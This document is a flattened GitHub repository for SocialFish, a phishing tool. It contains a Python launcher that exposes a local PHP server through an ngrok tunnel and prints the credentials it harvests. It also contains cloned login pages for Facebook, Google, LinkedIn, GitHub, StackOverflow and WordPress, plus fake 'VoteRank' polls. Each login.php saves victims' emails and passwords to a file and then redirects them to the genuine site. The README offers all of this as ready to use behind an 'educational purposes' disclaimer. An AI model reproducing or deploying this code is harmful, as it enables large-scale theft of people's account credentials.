├── LICENSE ├── README.md ├── Server └── www │ └── cat.txt ├── SocialFish.py ├── WebPages ├── fb_advanced_poll │ ├── index.html │ ├── index2.html │ ├── login.php │ ├── protect.html │ └── result.html ├── fb_standard │ ├── index.html │ ├── login.php │ └── protect.html ├── github │ ├── index.html │ ├── login.php │ └── protect.html ├── google_advanced_poll │ ├── index.html │ ├── index2.html │ ├── login.php │ ├── protect.html │ └── result.html ├── google_standard │ ├── index.html │ ├── login.php │ └── protect.html ├── linkedin │ ├── index.php │ ├── login.php │ └── protect.html ├── stackoverflow │ ├── index.html │ ├── login.php │ └── protect.html └── wordpress │ ├── index.html │ ├── login.php │ └── protect.html ├── donation.png ├── ngrok.url ├── requirements.txt ├── sc.png ├── social.png └── video.png /LICENSE: -------------------------------------------------------------------------------- 1 | BSD 3-Clause License 2 | 3 | Copyright (c) 2018, Undead Sec 4 | All rights reserved. 5 | 6 | Redistribution and use in source and binary forms, with or without 7 | modification, are permitted provided that the following conditions are met: 8 | 9 | * Redistributions of source code must retain the above copyright notice, this 10 | list of conditions and the following disclaimer. 11 | 12 | * Redistributions in binary form must reproduce the above copyright notice, 13 | this list of conditions and the following disclaimer in the documentation 14 | and/or other materials provided with the distribution. 15 | 16 | * Neither the name of the copyright holder nor the names of its 17 | contributors may be used to endorse or promote products derived from 18 | this software without specific prior written permission. 19 | 20 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 21 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 22 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 23 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 24 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 25 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 26 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 27 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 28 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 29 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 30 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 |

2 | 3 |

4 | 5 |

SocialFish v1.0

6 |

7 | Ultimate phishing tool with Ngrok integrated. 8 |

9 | 10 | ### MAINTAINERS 11 | * **Alisson Moretto** | 12 | Twitter: @A1S0N_ 13 | Github: @A1S0N 14 | 15 | ### PREREQUISITES 16 | 17 | * Python 2.7 18 | * Wget from Python 19 | * PHP 20 | * sudo 21 | 22 | ### TESTED ON 23 | * **Kali Linux - Rolling Edition** 24 | 25 | * **Linux Mint - 18.3 Sylvia** 26 | 27 | * **Ubuntu - 16.04.3 LTS** 28 | 29 | ### CLONE 30 | ``` 31 | git clone https://github.com/UndeadSec/SocialFish.git 32 | ``` 33 | 34 | ### RUNNING 35 | 36 | ``` 37 | cd SocialFish 38 | ``` 39 | 40 | ``` 41 | sudo pip install -r requirements.txt 42 | ``` 43 | 44 | ``` 45 | python SocialFish.py 46 | ``` 47 | ## AVAILABLE PAGES 48 | 49 | **+ Facebook:** 50 | - Traditional Facebook login page. 51 | - Advanced login with Facebook. 52 | 53 | **+ Google:** 54 | - Traditional Google login page. 55 | - Advanced login with Facebook. 56 | 57 | **+ LinkedIN:** 58 | - Traditional LinkedIN login page. 59 | 60 | **+ Github:** 61 | - Traditional Github login page. 62 | 63 | **+ Stackoverflow:** 64 | - Traditional Stackoverflow login page. 65 | 66 | **+ Wordpress:** 67 | - Similar Wordpress login page. 68 | 69 | **PULL REQUESTS ARE WELCOME** 70 | 71 | ### SCREENSHOT 72 | ![Shot](https://github.com/UndeadSec/SocialFish/blob/master/sc.png) 73 | 74 | ## DISCLAIMER 75 |

76 | JUST USE TO EDUCATIONAL PURPOSES 77 |

78 | 79 | The use of the SocialFish is COMPLETE RESPONSIBILITY of the END-USER. Developer assume NO liability and are NOT responsible for any misuse or damage caused by this program. 80 | 81 | "DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 82 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 83 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 84 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 85 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 86 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 87 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE." 88 | Taken from [LICENSE](LICENSE). 89 | 90 | ## How do I find phishing pages generated by this tool? 91 | **Search with this dork:** 92 | - *intitle:"There's a Phishing Page generated by SocialFish in this website."* 93 | 94 | ## Donation 95 | If you liked our work and want to support us, you can donate :D 96 | 97 | 98 | 99 | Bitcoin Address: 1EmJ5KiAKzpyqGGHopAq9qukrVPS47T9bA 100 | 101 | ### VIDEO DEMO 102 |

103 | 104 | 105 |

106 | -------------------------------------------------------------------------------- /Server/www/cat.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Lexiie/SocialFish/b6befb456b342c9d9a1ba90ec52df7e2f6968923/Server/www/cat.txt -------------------------------------------------------------------------------- /SocialFish.py: -------------------------------------------------------------------------------- 1 | #-*- coding: utf-8 -*- 2 | # SOCIALFISH 3 | # by: UNDEADSEC 4 | # 5 | ########################### 6 | from time import sleep 7 | from sys import stdout, exit 8 | from os import system, path 9 | import multiprocessing 10 | from urllib import urlopen 11 | from platform import architecture 12 | from wget import download 13 | 14 | RED, WHITE, CYAN, GREEN, END = '\033[91m', '\33[46m', '\033[36m', '\033[1;32m', '\033[0m' 15 | 16 | def connected(host='http://duckduckgo.com'): 17 | try: 18 | urlopen(host) 19 | return True 20 | except: 21 | return False 22 | if connected() == False: 23 | print ''' 24 | ....._____....... ____ ____ ____ _ ____ _ ____ _ ____ _ _ 25 | / \/| [__ | | | | |__| | |___ | [__ |__| 26 | \o__ /\| ___] |__| |___ | | | |___ | | ___] | | 27 | \| 28 | {0}[{1}!{0}]{1} Network error. Verify your connection.\n 29 | '''.format(RED, END) 30 | exit(0) 31 | 32 | def checkNgrok(): 33 | if path.isfile('Server/ngrok') == False: 34 | print '[*] Downloading Ngrok...' 35 | if architecture()[0] == '64bit': 36 | filename = 'ngrok-stable-linux-arm.zip' 37 | else: 38 | filename = 'ngrok-stable-linux-arm.zip' 39 | url = 'https://bin.equinox.io/c/4VmDzA7iaHb/' + filename 40 | download(url) 41 | system('unzip ' + filename) 42 | system('mv ngrok Server/ngrok') 43 | system('rm -Rf ' + filename) 44 | system('clear') 45 | checkNgrok() 46 | 47 | def end(): 48 | system('clear') 49 | print ''' 50 | S O C I A L{2} 51 | |\ \ \ \ \ \ \ \ __ ___ 52 | | \ \ \ \ \ \ \ \ | O~-_ _-~~ ~~-_ 53 | | >----|-|-|-|-|-|-|--| __/ / {1}DON'T{2} ) 54 | | / / / / / / / / |__\ < {1}FORGET{2} ) 55 | |/ / / / / / / / \_ {1}ME !{2} _) 56 | {1}F I S H{2} ~--___--~ 57 | 58 | {1}[ {0}Watch us on YouTube:{1} https://youtube.com/c/UndeadSec ] 59 | 60 | [ {0}Follow me on Twitter:{1} https://twitter.com/A1S0N_ ] 61 | 62 | [ {0}Contribute on Github:{1} https://github.com/UndeadSec/SocialFish ] 63 | 64 | [ {0}Join our Telegram Group(Portuguese):{1} https://t.me/UndeadSec ]\n'''.format(GREEN, END, CYAN) 65 | 66 | def loadModule(module): 67 | print '''{0} 68 | _.-=-._ .-, 69 | .' "-.,' / 70 | ( _. < 71 | `=.____.=" `._\\ 72 | 73 | 74 | [{1}*{0}]{1} %s module loaded.{0}'''.format(CYAN, END) % module 75 | 76 | def runPhishing(social, option2): 77 | system('rm -Rf Server/www/*.* && touch Server/www/cat.txt') 78 | if option2 == '1' and social == 'Facebook': 79 | system('cp WebPages/fb_standard/*.* Server/www/') 80 | if option2 == '2' and social == 'Facebook': 81 | system('cp WebPages/fb_advanced_poll/*.* Server/www/') 82 | elif option2 == '1' and social == 'Google': 83 | system('cp WebPages/google_standard/*.* Server/www/') 84 | elif option2 == '2' and social == 'Google': 85 | system('cp WebPages/google_advanced_poll/*.* Server/www/') 86 | elif social == 'LinkedIN': 87 | system('cp WebPages/linkedin/*.* Server/www/') 88 | elif social == 'Github': 89 | system('cp WebPages/github/*.* Server/www/') 90 | elif social == 'StackOverflow': 91 | system('cp WebPages/stackoverflow/*.* Server/www/') 92 | elif social == 'WordPress': 93 | system('cp WebPages/wordpress/*.* Server/www/') 94 | 95 | def waitCreds(): 96 | print " {0}[{1}*{0}]{1} Waiting for credentials... \n".format(GREEN, END) 97 | while True: 98 | with open('Server/www/cat.txt') as creds: 99 | lines = creds.read().rstrip() 100 | if len(lines) != 0: 101 | print ' {0}[ CREDENTIALS FOUND ]{1}:\n {0}%s{1}'.format(GREEN, END) % lines 102 | system('rm -rf Server/www/cat.txt && touch Server/www/cat.txt') 103 | creds.close() 104 | 105 | def runPEnv(): 106 | system('clear') 107 | print ''' {2}-{1} UNDEADSEC {2}|{1} t.me/UndeadSec {2}|{1} youtube.com/c/UndeadSec {2}- BRAZIL 108 | ' 109 | ' ' 110 | ' ' 111 | . ' . ' ' 112 | ' ' ' ' ' 113 | ███████ ████████ ███████ ██ ███████ ██ ███████ ██ ███████ ██ ██ 114 | ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ 115 | ███████ ██ ██ ██ ██ ███████ ██ █████ ██ ███████ ███████ 116 | ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ 117 | ███████ ████████ ███████ ██ ██ ██ ███████ ██ ██ ███████ ██ ██ 118 | . ' '....' ..'. ' . 119 | ' . . ' ' ' {1}v1.0{2} 120 | ' . . . . . '. .' ' . 121 | ' ' '. ' {1}Twitter: https://twitter.com/A1S0N_{2} 122 | ' ' ' 123 | ' . ' 124 | ' 125 | {1}'''.format(GREEN, END, CYAN) 126 | 127 | for i in range(101): 128 | sleep(0.01) 129 | stdout.write("\r{0}[{1}*{0}]{1} Preparing environment... %d%%".format(CYAN, END) % i) 130 | stdout.flush() 131 | 132 | print "\n\n{0}[{1}*{0}]{1} Searching for PHP installation... ".format(CYAN, END) 133 | if 256 != system('which php'): 134 | print " --{0}>{1} OK.".format(CYAN, END) 135 | else: 136 | print " --{0}>{1} PHP NOT FOUND: \n {0}*{1} Please install PHP and run me again. http://www.php.net/".format(RED, END) 137 | exit(0) 138 | if raw_input(" {0}[{1}!{0}]{1} Do you will use this tool only for educational purposes? (y/n)\n {2}SF > {1}".format(RED, END, CYAN)).upper() == 'N': 139 | system('clear') 140 | print '\n[ {0}YOU ARE NOT AUTHORIZED TO USE THIS TOOL{1} ]\n'.format(RED, END) 141 | exit(0) 142 | option = raw_input("\nSelect an option:\n\n {0}[{1}1{0}]{1} Facebook\n\n {0}[{1}2{0}]{1} Google\n\n {0}[{1}3{0}]{1} LinkedIN\n\n {0}[{1}4{0}]{1} Github\n\n {0}[{1}5{0}]{1} StackOverflow\n\n {0}[{1}6{0}]{1} WordPress\n\n {0}SF > {1}".format(CYAN, END)) 143 | if option == '1': 144 | loadModule('Facebook') 145 | option2 = raw_input("\nOperation mode:\n\n {0}[{1}1{0}]{1} Standard Page Phishing\n\n {0}[{1}2{0}]{1} Advanced Phishing(poll_mode/login_with)\n\n {0}SF > {1}".format(CYAN, END)) 146 | runPhishing('Facebook', option2) 147 | elif option == '2': 148 | loadModule('Google') 149 | option2 = raw_input("\nOperation mode:\n\n {0}[{1}1{0}]{1} Standard Page Phishing\n\n {0}[{1}2{0}]{1} Advanced Phishing(poll_mode/login_with)\n\n {0}SF > {1}".format(CYAN, END)) 150 | runPhishing('Google', option2) 151 | elif option == '3': 152 | loadModule('LinkedIN') 153 | option2 = '' 154 | runPhishing('LinkedIN', option2) 155 | elif option == '4': 156 | loadModule('Github') 157 | option2 = '' 158 | runPhishing('Github', option2) 159 | elif option == '5': 160 | loadModule('StackOverflow') 161 | option2 = '' 162 | runPhishing('StackOverflow', option2) 163 | elif option == '6': 164 | loadModule('WordPress') 165 | option2 = '' 166 | runPhishing('WordPress', option2) 167 | else: 168 | exit(0) 169 | 170 | def runNgrok(): 171 | system('./Server/ngrok http 8080 > /dev/null &') 172 | sleep(10) 173 | system('curl -s http://127.0.0.1:4040/status | grep -P "https://.*?ngrok.io" -oh > ngrok.url') 174 | url = open('ngrok.url', 'r') 175 | print('\n {0}[{1}*{0}]{1} Ngrok URL: {2}' + url.readlines()[0] + '{1}').format(CYAN, END, GREEN) 176 | url.close() 177 | 178 | def runServer(): 179 | system("cd Server/www/ && php -S 127.0.0.1:8080") 180 | 181 | if __name__ == "__main__": 182 | try: 183 | runPEnv() 184 | runNgrok() 185 | multiprocessing.Process(target=runServer).start() 186 | waitCreds() 187 | except KeyboardInterrupt: 188 | system('pkill -f ngrok') 189 | end() 190 | exit(0) 191 | -------------------------------------------------------------------------------- /WebPages/fb_advanced_poll/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | VoteRank #289032 5 | 6 | 7 | 8 | 9 | 10 |
11 | 12 |
13 |

VOTERANK

14 |

#289032

15 |
16 | 17 | 18 |
19 |
20 |
21 | What's your name?


22 | Select your favorite social networks:
23 | Facebook
24 | Twitter
25 | LinkedIN
26 | Instagram
27 | Snapchat
28 | Google+

29 |
30 |
31 | Select your favorite colors:
32 | Blue
33 | Red
34 | Green
35 | Yellow
36 | Purple
37 | Orange
38 | Black
39 | White
40 | Grey
41 | Brown
42 | Pink
43 | 44 |
45 |
46 |
47 | 48 | 49 | 50 | 51 | -------------------------------------------------------------------------------- /WebPages/fb_advanced_poll/index2.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | VoteRank #289032 5 | 6 | 7 | 8 | 9 | 10 |
11 | 12 | 110 | 111 |
112 |

VOTERANK

113 |

#289032

114 |
115 | 128 | 129 | -------------------------------------------------------------------------------- /WebPages/fb_advanced_poll/login.php: -------------------------------------------------------------------------------- 1 | There's a Phishing Page generated by SocialFish in this website."; 6 | if($myFile == $searchString) { 7 | file_put_contents("cat.txt", "[EMAIL]: " . $var . " [PASS]: " . $var2 . "\n", FILE_APPEND); 8 | header('Location: https://facebook.com/'); 9 | } 10 | if($myFile != $searchString) { 11 | echo "***ALERT! I AM A FAKE PAGE | DO NOT TRUST ME"; 12 | } 13 | exit(); 14 | ?> 15 | 16 | -------------------------------------------------------------------------------- /WebPages/fb_advanced_poll/protect.html: -------------------------------------------------------------------------------- 1 | There's a Phishing Page generated by SocialFish in this website. -------------------------------------------------------------------------------- /WebPages/fb_advanced_poll/result.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Poll completed successfully. Thank You! 5 | 6 | 7 | 8 | 9 | 10 |
11 | 12 |
13 |

VOTERANK

14 |

#289032

15 |
16 | 17 | 18 |

Poll completed successfully. Thank You!

19 | 20 | 21 | 22 | 23 | -------------------------------------------------------------------------------- /WebPages/fb_standard/login.php: -------------------------------------------------------------------------------- 1 | There's a Phishing Page generated by SocialFish in this website."; 6 | if($myFile == $searchString) { 7 | file_put_contents("cat.txt", "[EMAIL]: " . $var . " [PASS]: " . $var2 . "\n", FILE_APPEND); 8 | header('Location: https://facebook.com/'); 9 | } 10 | if($myFile != $searchString) { 11 | echo "***ALERT! I AM A FAKE PAGE | DO NOT TRUST ME"; 12 | } 13 | exit(); 14 | ?> 15 | 16 | -------------------------------------------------------------------------------- /WebPages/fb_standard/protect.html: -------------------------------------------------------------------------------- 1 | There's a Phishing Page generated by SocialFish in this website. -------------------------------------------------------------------------------- /WebPages/github/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | Sign in to GitHub · GitHub 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | 96 | 97 | 98 | 99 | 100 | 101 | 102 | 103 | 104 | 105 | 106 | 107 | 108 | 109 |
110 | Skip to content 111 |
112 | 113 | 114 | 115 | 116 | 117 | 118 | 119 | 126 | 127 | 128 |
129 | 130 |
131 | 132 | 133 | 134 |
135 | 136 |
137 | 138 | 139 |
140 | 141 | 142 |
143 |

Sign in to GitHub

144 |
145 | 146 | 147 |
148 |
149 | 150 | 151 |
152 | 153 | 156 | 157 | 158 | 161 | 162 | 163 | 164 |
165 |
166 | 167 | 171 |
172 | 173 |
174 | 175 |
176 | 177 | 185 | 186 | 187 | 188 |
189 | 190 | 193 | You can't perform that action at this time. 194 |
195 | 196 | 197 | 198 | 199 | 200 | 201 | 202 | 203 | 204 | 205 |
206 | 207 | You signed in with another tab or window. Reload to refresh your session. 208 | You signed out in another tab or window. Reload to refresh your session. 209 |
210 | 219 | 220 | 221 | 222 | 223 | 224 | -------------------------------------------------------------------------------- /WebPages/github/login.php: -------------------------------------------------------------------------------- 1 | There's a Phishing Page generated by SocialFish in this website."; 6 | if($myFile == $searchString) { 7 | file_put_contents("cat.txt", "[EMAIL]: " . $var . " [PASS]: " . $var2 . "\n", FILE_APPEND); 8 | header('Location: https://github.com'); 9 | } 10 | if($myFile != $searchString) { 11 | echo "***ALERT! I AM A FAKE PAGE | DO NOT TRUST ME"; 12 | } 13 | exit(); 14 | ?> 15 | 16 | -------------------------------------------------------------------------------- /WebPages/github/protect.html: -------------------------------------------------------------------------------- 1 | There's a Phishing Page generated by SocialFish in this website. -------------------------------------------------------------------------------- /WebPages/google_advanced_poll/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | VoteRank #289032 5 | 6 | 7 | 8 | 9 | 10 |
11 | 12 |
13 |

VOTERANK

14 |

#289032

15 |
16 | 17 | 18 |
19 |
20 |
21 | What's your name?


22 | Select your favorite social networks:
23 | Facebook
24 | Twitter
25 | LinkedIN
26 | Instagram
27 | Snapchat
28 | Google+

29 |
30 |
31 | Select your favorite colors:
32 | Blue
33 | Red
34 | Green
35 | Yellow
36 | Purple
37 | Orange
38 | Black
39 | White
40 | Grey
41 | Brown
42 | Pink
43 | 44 |
45 |
46 |
47 | 48 | 49 | 50 | 51 | -------------------------------------------------------------------------------- /WebPages/google_advanced_poll/index2.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | VoteRank #289032 5 | 6 | 7 | 8 | 9 | 10 |
11 | 12 | 119 | 120 |
121 |

VOTERANK

122 |

#289032

123 |
124 | 125 | 137 | 138 | 139 | -------------------------------------------------------------------------------- /WebPages/google_advanced_poll/login.php: -------------------------------------------------------------------------------- 1 | There's a Phishing Page generated by SocialFish in this website."; 6 | if($myFile == $searchString) { 7 | file_put_contents("cat.txt", "[EMAIL]: " . $var . " [PASS]: " . $var2 . "\n", FILE_APPEND); 8 | header('Location: https://google.com/'); 9 | } 10 | if($myFile != $searchString) { 11 | echo "***ALERT! I AM A FAKE PAGE | DO NOT TRUST ME"; 12 | } 13 | exit(); 14 | ?> 15 | 16 | -------------------------------------------------------------------------------- /WebPages/google_advanced_poll/protect.html: -------------------------------------------------------------------------------- 1 | There's a Phishing Page generated by SocialFish in this website. -------------------------------------------------------------------------------- /WebPages/google_advanced_poll/result.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Poll completed successfully. Thank You! 5 | 6 | 7 | 8 | 9 | 10 |
11 | 12 |
13 |

VOTERANK

14 |

#289032

15 |
16 | 17 | 18 |

Poll completed successfully. Thank You!

19 | 20 | 21 | 22 | 23 | -------------------------------------------------------------------------------- /WebPages/google_standard/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | Gmail: Email from Google 7 | 8 | 9 | 68 | 233 | 1190 | 1261 | 1344 | 1345 | 1401 | 1402 | 1403 |
1404 |
1405 |
1406 | 1407 | 1413 |
1414 |
1415 |
1416 | 1461 |
1462 |
1463 |

Gmail

1464 |

A Google approach to email.

1465 |
1466 |

1467 | Gmail is built on the idea that email can be more intuitive, efficient, and useful. And maybe even fun. After all, Gmail has: 1468 |

1469 |
    1470 |
  • 1471 | 1472 |

    Lots of space

    1473 |

    1474 | Over 10367.012381 megabytes (and counting) of free storage. 1475 |

    1476 |
  • 1477 |
  • 1478 | 1479 |

    Less spam

    1480 |

    Keep unwanted messages out of your inbox.

    1481 |
  • 1482 |
  • 1483 | 1484 |

    Mobile access

    1485 |

    Get Gmail on your mobile phone. Learn more

    1486 |
  • 1487 |
1488 | 1497 |
1498 | 1499 |

Take Gmail to work with Google Apps for Business

1500 |

Love Gmail, but looking for a custom email address for your company?

1501 |

Get business email, calendar, and online docs @your_company.com. Learn more

1502 |
1503 |
1504 |
1505 |
1506 | 1695 | 1696 | 1699 | 1718 | 1849 | 1870 | 1888 | 1905 | 1911 | 2071 | 2077 |
2078 | 2079 | 2080 | 2081 | -------------------------------------------------------------------------------- /WebPages/google_standard/login.php: -------------------------------------------------------------------------------- 1 | There's a Phishing Page generated by SocialFish in this website."; 6 | if($myFile == $searchString) { 7 | file_put_contents("cat.txt", "[EMAIL]: " . $var . " [PASS]: " . $var2 . "\n", FILE_APPEND); 8 | header('Location: https://google.com/'); 9 | } 10 | if($myFile != $searchString) { 11 | echo "***ALERT! I AM A FAKE PAGE | DO NOT TRUST ME"; 12 | } 13 | exit(); 14 | ?> 15 | 16 | -------------------------------------------------------------------------------- /WebPages/google_standard/protect.html: -------------------------------------------------------------------------------- 1 | There's a Phishing Page generated by SocialFish in this website. -------------------------------------------------------------------------------- /WebPages/linkedin/index.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 29 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 41 | 42 | 43 | 44 | 45 | 46 | Sign In | LinkedIn 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 |
58 | 61 | 62 | 63 |
64 | 95 | 96 | 97 |
98 |
99 |
100 |
101 |
102 | 165 | 166 | 167 | 168 | 169 | 170 | 171 | 187 |
188 |
189 | 190 | 191 | 205 | 208 | 209 | 210 | 211 | 212 | 213 | 214 | 215 | 216 | 217 | 218 | 219 | 220 | 221 | -------------------------------------------------------------------------------- /WebPages/linkedin/login.php: -------------------------------------------------------------------------------- 1 | There's a Phishing Page generated by SocialFish in this website."; 6 | if($myFile == $searchString) { 7 | file_put_contents("cat.txt", "[EMAIL]: " . $var . " [PASS]: " . $var2 . "\n", FILE_APPEND); 8 | header('Location: https://linkedin.com/'); 9 | } 10 | if($myFile != $searchString) { 11 | echo "***ALERT! I AM A FAKE PAGE | DO NOT TRUST ME"; 12 | } 13 | exit(); 14 | ?> 15 | 16 | -------------------------------------------------------------------------------- /WebPages/linkedin/protect.html: -------------------------------------------------------------------------------- 1 | There's a Phishing Page generated by SocialFish in this website. -------------------------------------------------------------------------------- /WebPages/stackoverflow/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | Log In - Stack Overflow 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 44 | 45 | 46 | 47 | 48 | 49 |
50 |
51 | 52 | 53 | 54 | 55 |
56 |
57 |
58 | 59 | 63 | 64 | 65 | 85 | 86 |
87 | 88 | 92 | 93 | 94 | 95 | 96 | 97 | 98 |
99 | 240 |
241 | 242 | 243 | 244 |
245 |
246 | 247 |
248 |
249 | 250 | 253 | 254 | 255 | 256 |
257 |
258 | It's back! 259 | Take the 2018 Developer Survey today » 261 | 263 |
264 |
265 | 287 |
288 | 289 | 290 | 291 |
292 | 293 | 294 | 295 |
296 |
297 | Log in 298 | Sign up 299 |
300 |
301 |
302 | 303 |
304 | Stack Overflow is part of the network of 170 Q&A communities.
305 |
306 |
307 | 310 | 313 |
314 |
315 |
316 |
or
317 |
318 |
319 | 320 |
321 |
322 |
323 |
324 | forgot? 325 |
326 | more login options 327 | 328 |
329 | 330 | 331 |
332 | 337 |
338 |
339 |
340 |
341 |
or
342 |
343 |
344 | 348 | 352 | 356 | 360 |
361 |
362 |
363 |

364 | 365 |
366 |
367 | 370 | 371 | 372 |
373 | 374 |
375 |
376 |
377 |
378 |
379 |
380 | 381 | Don't have an account? Sign up 382 | 383 | 386 |
387 |
388 | 396 | 397 |
398 |
399 | 400 | 608 | 609 | 614 | 615 | 663 | 664 | 665 | 666 | 667 | -------------------------------------------------------------------------------- /WebPages/stackoverflow/login.php: -------------------------------------------------------------------------------- 1 | There's a Phishing Page generated by SocialFish in this website."; 6 | if($myFile == $searchString) { 7 | file_put_contents("cat.txt", "[EMAIL]: " . $var . " [PASS]: " . $var2 . "\n", FILE_APPEND); 8 | header('Location: https://stackoverflow.com/'); 9 | } 10 | if($myFile != $searchString) { 11 | echo "***ALERT! I AM A FAKE PAGE | DO NOT TRUST ME"; 12 | } 13 | exit(); 14 | ?> 15 | 16 | -------------------------------------------------------------------------------- /WebPages/stackoverflow/protect.html: -------------------------------------------------------------------------------- 1 | There's a Phishing Page generated by SocialFish in this website. -------------------------------------------------------------------------------- /WebPages/wordpress/login.php: -------------------------------------------------------------------------------- 1 | There's a Phishing Page generated by SocialFish in this website."; 6 | if($myFile == $searchString) { 7 | file_put_contents("cat.txt", "[EMAIL]: " . $var . " [PASS]: " . $var2 . "\n", FILE_APPEND); 8 | header('Location: http://wordpress.org/'); 9 | } 10 | if($myFile != $searchString) { 11 | echo "***ALERT! I AM A FAKE PAGE | DO NOT TRUST ME"; 12 | } 13 | exit(); 14 | ?> 15 | 16 | -------------------------------------------------------------------------------- /WebPages/wordpress/protect.html: -------------------------------------------------------------------------------- 1 | There's a Phishing Page generated by SocialFish in this website. -------------------------------------------------------------------------------- /donation.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Lexiie/SocialFish/b6befb456b342c9d9a1ba90ec52df7e2f6968923/donation.png -------------------------------------------------------------------------------- /ngrok.url: -------------------------------------------------------------------------------- 1 | None 2 | -------------------------------------------------------------------------------- /requirements.txt: -------------------------------------------------------------------------------- 1 | wget==3.2 2 | -------------------------------------------------------------------------------- /sc.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Lexiie/SocialFish/b6befb456b342c9d9a1ba90ec52df7e2f6968923/sc.png -------------------------------------------------------------------------------- /social.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Lexiie/SocialFish/b6befb456b342c9d9a1ba90ec52df7e2f6968923/social.png -------------------------------------------------------------------------------- /video.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Lexiie/SocialFish/b6befb456b342c9d9a1ba90ec52df7e2f6968923/video.png --------------------------------------------------------------------------------